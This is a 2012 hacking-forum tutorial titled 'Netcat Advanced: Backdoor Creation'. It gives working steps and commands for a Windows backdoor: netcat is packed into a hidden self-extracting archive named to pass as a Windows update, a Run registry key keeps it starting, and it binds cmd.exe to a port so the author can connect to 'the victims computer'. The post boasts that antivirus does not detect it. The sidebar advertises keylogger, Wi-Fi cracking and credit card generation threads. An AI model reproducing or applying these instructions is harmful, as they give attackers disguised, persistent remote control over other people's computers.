Ethical Experts
Ethical Experts
Ethical Experts
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  Latest imagesLatest images  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Netcat Advanced: Backdoor Creation EmptyTue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Netcat Advanced: Backdoor Creation EmptyFri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Netcat Advanced: Backdoor Creation EmptyThu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Netcat Advanced: Backdoor Creation EmptySat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Netcat Advanced: Backdoor Creation EmptySat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Netcat Advanced: Backdoor Creation EmptySat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Netcat Advanced: Backdoor Creation EmptyWed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Netcat Advanced: Backdoor Creation EmptyFri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Netcat Advanced: Backdoor Creation EmptyFri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
Hacking With Keyloggers Prorat
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
netcat hack LARGEST wifi
Facebook Like
Similar topics

 

 Netcat Advanced: Backdoor Creation

Go down 
AuthorMessage
The Joker
Admin
Admin
The Joker


Posts : 182
Join date : 2012-06-11
Age : 33

Netcat Advanced: Backdoor Creation Empty
PostSubject: Netcat Advanced: Backdoor Creation   Netcat Advanced: Backdoor Creation EmptyThu Aug 16, 2012 2:16 pm

Netcat Advanced: Backdoor Creation


Disclaimer: I am not responsible for how this information is used. I do not condone illegal activity. It is simple. If it isn't your pc don't mess with it. In this tutorial I will go into further detail on creating a netcat backdoor. This backdoor is undetectable by most anti-vir[/u]us.[/u]

For this tutorial you will need:
- WinRar Archiver
- Netcat (nc.exe from nc111nt.zip)

After WinRar is installed, right click on nc.exe. Scroll down and click on Add to archive…

Rename nc.rar to whatever you want (windowsupdate.rar, patch.rar, abstraktisabadass.rar, etc...)

Under Archiving options check the box create SFX archive you should see the archive name change from name.rar to name.exe.

Click on the tab Advanced and on the right side click on SFX options

Under Path to extract type

Code:
Quote :
%homedrive%%homepath%\system32sys

Under Run after extraction type
Code:
nc.exe -vv -d -L -p 8080 -e cmd.exe

Under Run before extraction type

Code:
%windir%\system32\cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\System32sys\nc.exe -vv -d -L -p 8080 -e cmd.exe" /f > nul

Click on the tab [b]Modes
then check Hide all and Skip existing files (You may not have the option skip existing files depending on your version of WinRar. In this case don't worry about it. Your backdoor just won't be as cool as everyone elses. Very Happy)

Double check everything and click Ok, then click Ok again to create the backdoor. Your finished!

To connect to the victims computer Use nc <victims ip> <port> You should see the victims command prompt come up.

A SFX (SelF-eXtracting) archive is an archive merged with an executable module, which is used to extract files from the archive when executed. Thus, no external program is necessary to extract the contents of a SFX archive, it will execute itself. This backdoor sends nc.exe to the system32 folder. It then embeds itself into the registry. On startup it runs netcat in listening mode. Once connected to, it will forward the victims command prompt. It is undetected by all anti-virus that I have tried.. I hope this tutorial was helpful.
Back to top Go down
http://teamiha.tumblr.com
 
Netcat Advanced: Backdoor Creation
Back to top 
Page 1 of 1
 Similar topics
-
» Netcat Tutorial : Using Netcat As Backdoor

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: